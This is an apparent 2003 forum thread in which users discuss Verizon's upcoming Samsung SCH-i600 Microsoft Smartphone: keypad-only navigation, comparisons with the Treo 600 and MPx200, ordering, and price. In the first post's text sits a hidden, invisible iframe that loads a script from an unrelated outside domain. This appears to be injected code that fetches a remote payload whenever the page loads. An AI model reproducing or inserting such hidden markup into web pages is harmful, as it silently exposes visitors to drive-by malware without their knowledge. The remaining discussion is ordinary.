Looks like Verizon is getting ready to launch the Samsung SCH-i600 Microsoft Smartphone..<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
How functional do you think this will be without having a touchscreen/stylus? Just using a directional pad and predictive text entry doesn't seem very practical to me.
Well, that's the Smartphone design, and I'm sure Microsoft did a lot of testing on this. Those that I've talked to that have used the Smartphones have been OK with it.
I will say that having used a Treo 600 for a week now, I can see that you can accomplish a lot with a properly designed interface and never having to touch the stylus. If your needs are more toward the phone side, then this should be a good device for you.
the device is very nice, but i don't like the fact that you have to use the keypad to type emails...that's the sucky part....i'm so accustom to using the touch screen on the PPC, so we'll see what happens...
Just tried the Motorola MPx200 for a couple of days and I'm now a fan of the MS Smartphone platform (besides already being a Palm OS smartphone fan). I've come to realize that I don't care about a touch screen and in fact would prefer that you could navigate the entire system without a stylus. Since I have an account with Cingular and Verizon, I can't wait till either the Treo 600 or SCH I600 is released. The Treo will have the email advantage and the Samsung will have the form factor advantage. Screen is a toss up (Treo is probably brighter; resolution is better on Samsung). Can't wait.

Yesterday, 29 Oct. 2003 at the Tacoma Mall ( Tacoma, Washington ) the Verizon salesman reached deep in his pockets and showed me the up-comming Verizon version of the Samsung SGH-i500 / i600. He said I should be able to get one in late Nov. I put my order in on the spot. He accepted my order. We'll see.

Which is it...SGH or SCH, i500 or i600? I'm guessing you meant the SCH-i600? Sweet . I called the local VZW office to see if I could pre-order, but nope. They put my name down to "give me a call" when it arrives. Sure...I'll be calling instead of waiting, I think
Well, I ordered my i600 on Thursday night for overnight delivery. Hopefully it will show up on Monday at the office!
As you know, the i600 is showing up as an upgrade option if you put in your zip code as a California zip on the Verizon Wireless site. I just ordered it from there with a Texas shipping address. All the people I talked to in Customer Service led me to believe that my order is indeed shipping. It's an expensive phone at $629 plus tax and shipping, but I guess that's the price of being an early adopter.
